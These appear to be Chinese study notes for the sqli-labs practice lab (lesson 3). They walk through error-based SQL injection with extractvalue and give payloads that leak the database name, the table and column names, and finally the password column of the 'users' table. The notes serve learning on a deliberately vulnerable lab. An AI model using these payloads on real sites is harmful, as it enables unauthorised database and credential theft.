报错

Sql-libs3

一

注入点检测   判断闭合  报错验证

 

 

二

利用extractvalue和updatexml函数的xpath参数错误会进行报错

Xpath中出现0x7e会报错

 

 

?id=1') and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

三

表名

 

 

?id=1') and extractvalue(1,concat(0x7e,(select (group_concat(table_name))from information_schema.tables where table_schema='security'),0x7e))--+

 

四

列名

 

 

?id=1') and extractvalue(1,concat(0x7e,(select (group_concat(column_name))from information_schema.columns where table_schema='security' and table_name='users'),0x7e))--+

五

字段

 

 

 

?id=1') and extractvalue(1,concat(0x7e,(select (group_concat(password))from users),0x7e))--+